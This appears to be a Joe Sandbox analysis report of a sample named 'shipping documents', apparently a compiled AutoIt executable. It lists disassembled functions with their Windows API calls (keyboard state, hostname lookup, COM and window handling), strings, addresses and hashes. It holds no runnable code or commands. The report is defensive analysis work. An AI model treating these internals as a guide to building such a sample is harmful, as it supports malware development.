API ID: Object$BitsCompatibleCreateDeleteSelect$BitmapReleaseStretch
String ID: (
API String ID: 2598888154-3887548279
Opcode ID: b9297e800daf177f2af89cfd0a17c12d4bab8715a1d64a1ad7b573825f9b152a
Instruction ID: a00835183f98fe43f1542320e15bc714438a13af78aede1009786236810a289f
Opcode Fuzzy Hash: b9297e800daf177f2af89cfd0a17c12d4bab8715a1d64a1ad7b573825f9b152a
Instruction Fuzzy Hash: 48512875904209EFCB15CFA9CC85EAEBBBAEF48710F14852EF95A97210D731A941CF60

Function 00656BEC Relevance: 19.7, APIs: 4, Strings: 7, Instructions: 478COMMON

Download Yara Rule

APIs

Part of subcall function 00670B9B: GetCurrentDirectoryW.KERNEL32(00007FFF,?,?,?,00656C6C,?,00008000), ref: 00670BB7

Part of subcall function 006548AE: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,006548A1,?,?,006537C0,?), ref: 006548CE

SetCurrentDirectoryW.KERNEL32(?,?,?,?,00000000), ref: 00656D0D
SetCurrentDirectoryW.KERNEL32(?), ref: 00656E5A

Part of subcall function 006559CD: _wcscpy.LIBCMT ref: 00655A05

Part of subcall function 0067387D: _iswctype.LIBCMT ref: 00673885

Strings

Bad directive syntax error, xrefs: 0068EBC6
Error opening the file, xrefs: 0068E866, 0068E8E1
Unterminated string, xrefs: 0068EC0D
EA06, xrefs: 0068E87B
#include depth exceeded. Make sure there are no recursive includes, xrefs: 0068E84A
>>>AUTOIT SCRIPT<<<, xrefs: 0068E8BF
AU3!, xrefs: 00656CC1

Memory Dump Source

Source File: 00000000.00000002.2067786039.0000000000651000.00000020.00000001.01000000.00000003.sdmp, Offset: 00650000, based on PE: true

Associated: 00000000.00000002.2067764560.0000000000650000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2067895724.00000000006DF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2067895724.0000000000705000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2067936093.000000000070F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2067952140.0000000000718000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_650000_shipping documents.jbxd

Similarity

API ID: CurrentDirectory$FullNamePath_iswctype_wcscpy
String ID: #include depth exceeded. Make sure there are no recursive includes$>>>AUTOIT SCRIPT<<<$AU3!$Bad directive syntax error$EA06$Error opening the file$Unterminated string
API String ID: 537147316-1018226102
Opcode ID: e7d0845b679d4430bab745806a372331e1aa54c4d9fe919c76200adb50ce94a3
Instruction ID: eaec2d17347046b81cf353f456690f4cc53cd71a1e3b4e9fb2c5bf7027b7f69f
Opcode Fuzzy Hash: e7d0845b679d4430bab745806a372331e1aa54c4d9fe919c76200adb50ce94a3
Instruction Fuzzy Hash: 4F02CE71108341DFC764EF24C891AAFBBE6BF99314F044A1DF88A972A1DB31D949CB46

Function 006545DF Relevance: 19.7, APIs: 13, Instructions: 215windowCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 006545F9
GetMenuItemCount.USER32(00716890), ref: 0068D7CD
GetMenuItemCount.USER32(00716890), ref: 0068D87D
GetCursorPos.USER32(?), ref: 0068D8C1
SetForegroundWindow.USER32(00000000), ref: 0068D8CA
TrackPopupMenuEx.USER32(00716890,00000000,?,00000000,00000000,00000000), ref: 0068D8DD
PostMessageW.USER32(00000000,00000000,00000000,00000000), ref: 0068D8E9

Memory Dump Source

Source File: 00000000.00000002.2067786039.0000000000651000.00000020.00000001.01000000.00000003.sdmp, Offset: 00650000, based on PE: true

Associated: 00000000.00000002.2067764560.0000000000650000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2067895724.00000000006DF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2067895724.0000000000705000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2067936093.000000000070F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2067952140.0000000000718000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_650000_shipping documents.jbxd

Similarity

API ID: Menu$CountItem$CursorForegroundMessagePopupPostTrackWindow_memset
String ID:
API String ID: 2751501086-0
Opcode ID: a1664a9d3f5f228c4b95fa4d54293ed5fd5e0c4089681f267dfec5a8878cd61a
Instruction ID: 0dd5c4b48dddb1a14162d2d252ded3e22123d9b980b09d35de8d39efb6e6c312
Opcode Fuzzy Hash: a1664a9d3f5f228c4b95fa4d54293ed5fd5e0c4089681f267dfec5a8878cd61a
Instruction Fuzzy Hash: 3B71F570A45205BFEB20AF24DC45FEABF67FF05368F244216F915A62E0CBB15850DBA4

Function 006C8BC0 Relevance: 19.6, APIs: 10, Strings: 1, Instructions: 324fileCOMMON

Download Yara Rule

APIs

VariantInit.OLEAUT32(?), ref: 006C8BEC
CoInitialize.OLE32(00000000), ref: 006C8C19
CoUninitialize.OLE32 ref: 006C8C23
GetRunningObjectTable.OLE32(00000000,?), ref: 006C8D23
SetErrorMode.KERNEL32(00000001,00000029), ref: 006C8E50
CoGetInstanceFromFile.OLE32(00000000,?,00000000,00000015,00000002,?,00000001,006E2C0C), ref: 006C8E84
CoGetObject.OLE32(?,00000000,006E2C0C,?), ref: 006C8EA7
SetErrorMode.KERNEL32(00000000), ref: 006C8EBA
SetErrorMode.KERNEL32(00000000,00000000,00000000,00000000,00000000), ref: 006C8F3A
VariantClear.OLEAUT32(?), ref: 006C8F4A

Strings

,,n, xrefs: 006C8BD6

Memory Dump Source

Source File: 00000000.00000002.2067786039.0000000000651000.00000020.00000001.01000000.00000003.sdmp, Offset: 00650000, based on PE: true

Associated: 00000000.00000002.2067764560.0000000000650000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2067895724.00000000006DF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2067895724.0000000000705000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2067936093.000000000070F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2067952140.0000000000718000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_650000_shipping documents.jbxd

Similarity

API ID: ErrorMode$ObjectVariant$ClearFileFromInitInitializeInstanceRunningTableUninitialize
String ID: ,,n
API String ID: 2395222682-1563246951
Opcode ID: 7f9b0927ab45f508cbdef82d0076505295d57b24ab28e1174816c73d8285173e
Instruction ID: 55a1cbf14737b29862ae20493ea569b7be83d89893c77dca1485c958923d5c77
Opcode Fuzzy Hash: 7f9b0927ab45f508cbdef82d0076505295d57b24ab28e1174816c73d8285173e
Instruction Fuzzy Hash: 51C124B1604305AFD710DF24C884E6AB7EAFF89748F10496DF98A9B251DB31ED05CB52

Function 006D10A5 Relevance: 19.4, APIs: 1, Strings: 10, Instructions: 120COMMON

Download Yara Rule

APIs

CharUpperBuffW.USER32(?,?,?,?,?,?,?,006D0038,?,?), ref: 006D10BC

Strings

HKLM, xrefs: 006D113A
HKEY_LOCAL_MACHINE, xrefs: 006D1125
HKEY_CURRENT_CONFIG, xrefs: 006D1179
HKEY_CLASSES_ROOT, xrefs: 006D114F
HKCU, xrefs: 006D11AC
HKEY_CURRENT_USER, xrefs: 006D119B
HKCC, xrefs: 006D118A
HKEY_USERS, xrefs: 006D11BD
HKCR, xrefs: 006D1164
HKU, xrefs: 006D11CE

Memory Dump Source

Source File: 00000000.00000002.2067786039.0000000000651000.00000020.00000001.01000000.00000003.sdmp, Offset: 00650000, based on PE: true

Associated: 00000000.00000002.2067764560.0000000000650000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2067895724.00000000006DF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2067895724.0000000000705000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2067936093.000000000070F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2067952140.0000000000718000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_650000_shipping documents.jbxd

Similarity

API ID: BuffCharUpper
String ID: HKCC$HKCR$HKCU$HKEY_CLASSES_ROOT$HKEY_CURRENT_CONFIG$HKEY_CURRENT_USER$HKEY_LOCAL_MACHINE$HKEY_USERS$HKLM$HKU
API String ID: 3964851224-909552448
Opcode ID: 96a55894fac28868666c25b394255074fb0e99416f29c7dd47bd32abe43fce21
Instruction ID: 2f837458081811ee9f5ea2f5b34d5e99a9f88443f8246bcab5ca07fec1451a43
Opcode Fuzzy Hash: 96a55894fac28868666c25b394255074fb0e99416f29c7dd47bd32abe43fce21
Instruction Fuzzy Hash: 2A417E3094024EDBDF20EF90DC91AEA3766BF16300F108569FC955B391DB71AA5ACB60

Function 006B5569 Relevance: 19.3, APIs: 5, Strings: 6, Instructions: 74COMMON

Download Yara Rule

APIs

Part of subcall function 00657D2C: _memmove.LIBCMT ref: 00657D66

Part of subcall function 00657A84: _memmove.LIBCMT ref: 00657B0D

mciSendStringW.WINMM(status PlayMe mode,?,00000100,00000000), ref: 006B55D2
mciSendStringW.WINMM(close PlayMe,00000000,00000000,00000000), ref: 006B55E8
mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 006B55F9
mciSendStringW.WINMM(play PlayMe wait,00000000,00000000,00000000), ref: 006B560B
mciSendStringW.WINMM(play PlayMe,00000000,00000000,00000000), ref: 006B561C

Strings

open , xrefs: 006B5581
play PlayMe, xrefs: 006B5617
close PlayMe, xrefs: 006B55E3, 006B5610
play PlayMe wait, xrefs: 006B5606
status PlayMe mode, xrefs: 006B55CD
alias PlayMe, xrefs: 006B55AB

Memory Dump Source

Source File: 00000000.00000002.2067786039.0000000000651000.00000020.00000001.01000000.00000003.sdmp, Offset: 00650000, based on PE: true

Associated: 00000000.00000002.2067764560.0000000000650000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2067895724.00000000006DF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2067895724.0000000000705000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2067936093.000000000070F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2067952140.0000000000718000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_650000_shipping documents.jbxd

Similarity

API ID: SendString$_memmove
String ID: alias PlayMe$close PlayMe$open $play PlayMe$play PlayMe wait$status PlayMe mode
API String ID: 2279737902-1007645807
Opcode ID: 6296cb55380254f1009370b9cc9c9eec6bdeee3ce05975a129ea68f727401528
Instruction ID: d6916f7ed1a6dcb79cbb152216fd2477196040f72a28c396d5abb2c790139a71
Opcode Fuzzy Hash: 6296cb55380254f1009370b9cc9c9eec6bdeee3ce05975a129ea68f727401528
Instruction Fuzzy Hash: 1C11C4B0950269B9D720F771DC4ADFFBBBDEF95B00F400569B802A20D1EEA40D49C6A1

Function 006B48F3 Relevance: 19.3, APIs: 10, Strings: 1, Instructions: 73networkCOMMON

Download Yara Rule

APIs

WSAStartup.WSOCK32(00000101,?), ref: 006B490E
gethostname.WSOCK32(?,00000100), ref: 006B4928
gethostbyname.WSOCK32(?), ref: 006B4935
_wcscpy.LIBCMT ref: 006B495D
_memmove.LIBCMT ref: 006B4970
inet_ntoa.WSOCK32(?), ref: 006B497B
_strcat.LIBCMT ref: 006B4989
_wcscpy.LIBCMT ref: 006B49A0
WSACleanup.WSOCK32 ref: 006B49AE
_wcscpy.LIBCMT ref: 006B49BC

Strings

0.0.0.0, xrefs: 006B4957

Memory Dump Source

Source File: 00000000.00000002.2067786039.0000000000651000.00000020.00000001.01000000.00000003.sdmp, Offset: 00650000, based on PE: true

Associated: 00000000.00000002.2067764560.0000000000650000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2067895724.00000000006DF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2067895724.0000000000705000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2067936093.000000000070F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2067952140.0000000000718000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_650000_shipping documents.jbxd

Similarity

API ID: _wcscpy$CleanupStartup_memmove_strcatgethostbynamegethostnameinet_ntoa
String ID: 0.0.0.0
API String ID: 208665112-3771769585
Opcode ID: dce5e8a513866a93895352214b74039ffc0ad9ad3611eae01cac2341274d2038
Instruction ID: dfec8729ed1f24f2bb37d6fcb6d32009b069d1d20e320f5d95f0838cbbeb76d4
Opcode Fuzzy Hash: dce5e8a513866a93895352214b74039ffc0ad9ad3611eae01cac2341274d2038
Instruction Fuzzy Hash: 3E11D271D04115ABCB24BB24AC0AEDB77BE9F01710F0481BAF40996192EF749AC19B65

Function 006B5217 Relevance: 19.3, APIs: 10, Strings: 1, Instructions: 72sleepwindowtimeCOMMON

Download Yara Rule

APIs

timeGetTime.WINMM ref: 006B521C

Part of subcall function 00670719: timeGetTime.WINMM(?,75A8B400,00660FF9), ref: 0067071D

Sleep.KERNEL32(0000000A), ref: 006B5248
EnumThreadWindows.USER32(?,Function_000651CA,00000000), ref: 006B526C
FindWindowExW.USER32(00000000,00000000,BUTTON,00000000), ref: 006B528E
SetActiveWindow.USER32 ref: 006B52AD
SendMessageW.USER32(00000000,000000F5,00000000,00000000), ref: 006B52BB
SendMessageW.USER32(00000010,00000000,00000000), ref: 006B52DA
Sleep.KERNEL32(000000FA), ref: 006B52E5
IsWindow.USER32 ref: 006B52F1
EndDialog.USER32(00000000), ref: 006B5302

Strings

BUTTON, xrefs: 006B5280

Memory Dump Source

Source File: 00000000.00000002.2067786039.0000000000651000.00000020.00000001.01000000.00000003.sdmp, Offset: 00650000, based on PE: true

Associated: 00000000.00000002.2067764560.0000000000650000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2067895724.00000000006DF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2067895724.0000000000705000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2067936093.000000000070F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2067952140.0000000000718000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_650000_shipping documents.jbxd

Similarity

API ID: Window$MessageSendSleepTimetime$ActiveDialogEnumFindThreadWindows
String ID: BUTTON
API String ID: 1194449130-3405671355
Opcode ID: 8eebc02c4be021340ab96b806878c8e22db23ad266910254794c0a19f3105e05
Instruction ID: d2f9bd38ff08356dd1f195d5c6d8b45fa0c1bcd7a4867faca789249b38497b29
Opcode Fuzzy Hash: 8eebc02c4be021340ab96b806878c8e22db23ad266910254794c0a19f3105e05
Instruction Fuzzy Hash: A321A4B0606704AFE7045B24ED88BE53BABEB55346F04A439F103812F1DB759D90C725

Function 006BD7F8 Relevance: 18.3, APIs: 12, Instructions: 283comCOMMON

Download Yara Rule

APIs

Part of subcall function 00659997: __itow.LIBCMT ref: 006599C2
Part of subcall function 00659997: __swprintf.LIBCMT ref: 00659A0C

CoInitialize.OLE32(00000000), ref: 006BD855
SHGetSpecialFolderLocation.SHELL32(00000000,00000000,?), ref: 006BD8E8
SHGetDesktopFolder.SHELL32(?), ref: 006BD8FC
CoCreateInstance.OLE32(006E2D7C,00000000,00000001,0070A89C,?), ref: 006BD948
SHCreateShellItem.SHELL32(00000000,00000000,?,00000003), ref: 006BD9B7
CoTaskMemFree.OLE32(?,?), ref: 006BDA0F
_memset.LIBCMT ref: 006BDA4C
SHBrowseForFolderW.SHELL32(?), ref: 006BDA88
SHGetPathFromIDListW.SHELL32(00000000,?), ref: 006BDAAB
CoTaskMemFree.OLE32(00000000), ref: 006BDAB2
CoTaskMemFree.OLE32(00000000,00000001,00000000), ref: 006BDAE9
CoUninitialize.OLE32(00000001,00000000), ref: 006BDAEB

Memory Dump Source

Source File: 00000000.00000002.2067786039.0000000000651000.00000020.00000001.01000000.00000003.sdmp, Offset: 00650000, based on PE: true

Associated: 00000000.00000002.2067764560.0000000000650000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2067895724.00000000006DF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2067895724.0000000000705000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2067936093.000000000070F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2067952140.0000000000718000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_650000_shipping documents.jbxd

Similarity

API ID: FolderFreeTask$Create$BrowseDesktopFromInitializeInstanceItemListLocationPathShellSpecialUninitialize__itow__swprintf_memset
String ID:
API String ID: 1246142700-0
Opcode ID: 96f37b5fb7b3d859d57168339603bbc08b82c15548636146efa5c9709daeaf3e
Instruction ID: a130e54ae52127fbae10333da0528fdc1a77422ae52bf669748b4517dc24994d
Opcode Fuzzy Hash: 96f37b5fb7b3d859d57168339603bbc08b82c15548636146efa5c9709daeaf3e
Instruction Fuzzy Hash: 29B1FB75A00109AFDB44DF64C888DAEBBFAEF48315F148469F90AEB251DB30ED45CB54

Function 006B052C Relevance: 18.2, APIs: 12, Instructions: 186keyboardCOMMON

Download Yara Rule

APIs

GetKeyboardState.USER32(?), ref: 006B05A7
SetKeyboardState.USER32(?), ref: 006B0612
GetAsyncKeyState.USER32(000000A0), ref: 006B0632
GetKeyState.USER32(000000A0), ref: 006B0649
GetAsyncKeyState.USER32(000000A1), ref: 006B0678
GetKeyState.USER32(000000A1), ref: 006B0689
GetAsyncKeyState.USER32(00000011), ref: 006B06B5
GetKeyState.USER32(00000011), ref: 006B06C3
GetAsyncKeyState.USER32(00000012), ref: 006B06EC
GetKeyState.USER32(00000012), ref: 006B06FA
GetAsyncKeyState.USER32(0000005B), ref: 006B0723
GetKeyState.USER32(0000005B), ref: 006B0731

Memory Dump Source

Source File: 00000000.00000002.2067786039.0000000000651000.00000020.00000001.01000000.00000003.sdmp, Offset: 00650000, based on PE: true

Associated: 00000000.00000002.2067764560.0000000000650000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2067895724.00000000006DF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2067895724.0000000000705000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2067936093.000000000070F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2067952140.0000000000718000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_650000_shipping documents.jbxd

Similarity

API ID: State$Async$Keyboard
String ID:
API String ID: 541375521-0
Opcode ID: 1f825c6c13f3afed44a47d434fd66c067a877f8b84a4f9abb5a89193243c6233
Instruction ID: 8aee886cb4c00391c62ed16504bc901ecc9c63df7bf392f3e24c8d3ca64e80ad
Opcode Fuzzy Hash: 1f825c6c13f3afed44a47d434fd66c067a877f8b84a4f9abb5a89193243c6233
Instruction Fuzzy Hash: 56511CA0A0478429FB34DBB085547EBBFB69F02380F08459ED5C25A6C3EA54ABCCCB55

Function 006AC72A Relevance: 18.2, APIs: 12, Instructions: 174COMMON

Download Yara Rule

APIs

GetDlgItem.USER32(?,00000001), ref: 006AC746
GetWindowRect.USER32(00000000,?), ref: 006AC758
MoveWindow.USER32(00000001,0000000A,?,00000001,?,00000000), ref: 006AC7B6
GetDlgItem.USER32(?,00000002), ref: 006AC7C1
GetWindowRect.USER32(00000000,?), ref: 006AC7D3
MoveWindow.USER32(00000001,?,00000000,00000001,?,00000000), ref: 006AC827
GetDlgItem.USER32(?,000003E9), ref: 006AC835
GetWindowRect.USER32(00000000,?), ref: 006AC846
MoveWindow.USER32(00000000,0000000A,00000000,?,?,00000000), ref: 006AC889
GetDlgItem.USER32(?,000003EA), ref: 006AC897
MoveWindow.USER32(00000000,0000000A,0000000A,?,-00000005,00000000), ref: 006AC8B4
InvalidateRect.USER32(?,00000000,00000001), ref: 006AC8C1

Memory Dump Source

Source File: 00000000.00000002.2067786039.0000000000651000.00000020.00000001.01000000.00000003.sdmp, Offset: 00650000, based on PE: true

Associated: 00000000.00000002.2067764560.0000000000650000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2067895724.00000000006DF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2067895724.0000000000705000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2067936093.000000000070F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2067952140.0000000000718000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_650000_shipping documents.jbxd

Similarity

API ID: Window$ItemMoveRect$Invalidate
String ID:
API String ID: 3096461208-0
Opcode ID: 7733a91f4127e4cb35e512958f1146ffa0680889bc104b44641406c6355cf91a
Instruction ID: ea993fe04d7010a548c4e522fa4f45c276ea0cbb5fec8b01a93e6eb53ce36b2b
Opcode Fuzzy Hash: 7733a91f4127e4cb35e512958f1146ffa0680889bc104b44641406c6355cf91a
Instruction Fuzzy Hash: 3B513E71B00205ABDB18DFA9DD99AAEBBBAFB89310F14812DF516D6290DB70DD008B50

Function 0065201B Relevance: 18.2, APIs: 12, Instructions: 170timeCOMMON

Download Yara Rule

APIs

Part of subcall function 00651B41: InvalidateRect.USER32(?,00000000,00000001,?,?,?,00652036,?,00000000,?,?,?,?,006516CB,00000000,?), ref: 00651B9A

DestroyWindow.USER32(?,?,?,?,?,?,?,?,?,?,?,00000000,?,?), ref: 006520D3
KillTimer.USER32(-00000001,?,?,?,?,006516CB,00000000,?,?,00651AE2,?,?), ref: 0065216E
DestroyAcceleratorTable.USER32(00000000), ref: 0068BEF6
ImageList_Destroy.COMCTL32(00000000,?,00000000,?,?,?,?,006516CB,00000000,?,?,00651AE2,?,?), ref: 0068BF27
ImageList_Destroy.COMCTL32(00000000,?,00000000,?,?,?,?,006516CB,00000000,?,?,00651AE2,?,?), ref: 0068BF3E
ImageList_Destroy.COMCTL32(00000000,?,00000000,?,?,?,?,006516CB,00000000,?,?,00651AE2,?,?), ref: 0068BF5A
DeleteObject.GDI32(00000000), ref: 0068BF6C

Memory Dump Source

Source File: 00000000.00000002.2067786039.0000000000651000.00000020.00000001.01000000.00000003.sdmp, Offset: 00650000, based on PE: true

Associated: 00000000.00000002.2067764560.0000000000650000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2067895724.00000000006DF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2067895724.0000000000705000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2067936093.000000000070F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2067952140.0000000000718000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_650000_shipping documents.jbxd

Similarity

API ID: Destroy$ImageList_$AcceleratorDeleteInvalidateKillObjectRectTableTimerWindow
String ID:
API String ID: 641708696-0
Opcode ID: b208a7c6bfb42f5ef09fd0a0b6939628f545ac75ff4add3f449cb30a3d045550
Instruction ID: ff3e3a79845ceccad4a7a42357245e8cc3f1ca0b352e89427f93ba78f64ba714
Opcode Fuzzy Hash: b208a7c6bfb42f5ef09fd0a0b6939628f545ac75ff4add3f449cb30a3d045550
Instruction Fuzzy Hash: C661AC30502611DFCB35AF18DD58BAAB7F3FB41312F10952DEA4287AA0C775A895CF54

Function 006521A5 Relevance: 18.1, APIs: 12, Instructions: 132COMMON

Download Yara Rule

APIs

Part of subcall function 006525DB: GetWindowLongW.USER32(?,000000EB), ref: 006525EC

GetSysColor.USER32(0000000F), ref: 006521D3

Memory Dump Source

Source File: 00000000.00000002.2067786039.0000000000651000.00000020.00000001.01000000.00000003.sdmp, Offset: 00650000, based on PE: true

Associated: 00000000.00000002.2067764560.0000000000650000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2067895724.00000000006DF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2067895724.0000000000705000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2067936093.000000000070F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2067952140.0000000000718000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_650000_shipping documents.jbxd

Similarity

API ID: ColorLongWindow
String ID:
API String ID: 259745315-0
Opcode ID: 6ae509c2ff3d26f520213af71422ae30d8ba29501e78f1641dbb14c37e013d49
Instruction ID: 5c1f5b92a026d0cc55974e48d19ded296b49bc8a6a0b7850c9231871ad896072
Opcode Fuzzy Hash: 6ae509c2ff3d26f520213af71422ae30d8ba29501e78f1641dbb14c37e013d49
Instruction Fuzzy Hash: ED41B1355011419ADB215F28EC98BF93B67EB07332F184366FD668A2E2C7318E46DB21

Function 006BAB12 Relevance: 17.7, APIs: 3, Strings: 7, Instructions: 183COMMON

Download Yara Rule

APIs

CharLowerBuffW.USER32(?,?,006DF910), ref: 006BAB76
GetDriveTypeW.KERNEL32(00000061,0070A620,00000061), ref: 006BAC40
_wcscpy.LIBCMT ref: 006BAC6A

Strings

ramdisk, xrefs: 006BABEA
cdrom, xrefs: 006BAB92
all, xrefs: 006BAB7C
network, xrefs: 006BABD4
unknown, xrefs: 006BAC01
removable, xrefs: 006BABA8
fixed, xrefs: 006BABBE

Memory Dump Source

Source File: 00000000.00000002.2067786039.0000000000651000.00000020.00000001.01000000.00000003.sdmp, Offset: 00650000, based on PE: true

Associated: 00000000.00000002.2067764560.0000000000650000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2067895724.00000000006DF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2067895724.0000000000705000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2067936093.000000000070F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2067952140.0000000000718000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_650000_shipping documents.jbxd

Similarity

API ID: BuffCharDriveLowerType_wcscpy
String ID: all$cdrom$fixed$network$ramdisk$removable$unknown
API String ID: 2820617543-1000479233
Opcode ID: fcc94f31391374b568c261518e83834e8561a0fbdfc870e1283cf0eef67879d1
Instruction ID: 564e36250ebee3548fdf486add16bcd1d8249e614b1135af32bc6c3626a57eaf
Opcode Fuzzy Hash: fcc94f31391374b568c261518e83834e8561a0fbdfc870e1283cf0eef67879d1
Instruction Fuzzy Hash: 3E519C70108301DBC760EF54C891AAAB7E7EF80301F14892DF896572A2DB319D8ACB63

Function 006DC27C Relevance: 17.6, APIs: 6, Strings: 4, Instructions: 149windowCOMMON

Download Yara Rule

APIs

Part of subcall function 00652612: GetWindowLongW.USER32(?,000000EB), ref: 00652623

Part of subcall function 00652344: GetCursorPos.USER32(?), ref: 00652357
Part of subcall function 00652344: ScreenToClient.USER32(007167B0,?), ref: 00652374
Part of subcall function 00652344: GetAsyncKeyState.USER32(00000001), ref: 00652399
Part of subcall function 00652344: GetAsyncKeyState.USER32(00000002), ref: 006523A7

ImageList_DragLeave.COMCTL32(00000000,00000000,00000001,?,?), ref: 006DC2E4
ImageList_EndDrag.COMCTL32 ref: 006DC2EA
ReleaseCapture.USER32 ref: 006DC2F0
SetWindowTextW.USER32(?,00000000), ref: 006DC39A
SendMessageW.USER32(?,000000B1,00000000,000000FF), ref: 006DC3AD
DefDlgProcW.USER32(?,00000202,?,?,00000000,00000001,?,?), ref: 006DC48F

Strings

@GUI_DRAGFILE, xrefs: 006DC424
prq, xrefs: 006DC438
prq, xrefs: 006DC3FD
@GUI_DROPID, xrefs: 006DC3E1

Memory Dump Source

Source File: 00000000.00000002.2067786039.0000000000651000.00000020.00000001.01000000.00000003.sdmp, Offset: 00650000, based on PE: true

Associated: 00000000.00000002.2067764560.0000000000650000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2067895724.00000000006DF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2067895724.0000000000705000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2067936093.000000000070F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2067952140.0000000000718000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_650000_shipping documents.jbxd

Similarity

API ID: AsyncDragImageList_StateWindow$CaptureClientCursorLeaveLongMessageProcReleaseScreenSendText
String ID: @GUI_DRAGFILE$@GUI_DROPID$prq$prq
API String ID: 1924731296-770718762
Opcode ID: 1c7cf72562cc001a7ee97ecf5a26a86d5e7f1bd36a3921a1da7703b26187e210
Instruction ID: d72eff42643b02a41c96f2046b4ca83dd38f037a39d2a90e849c9a926d970da6
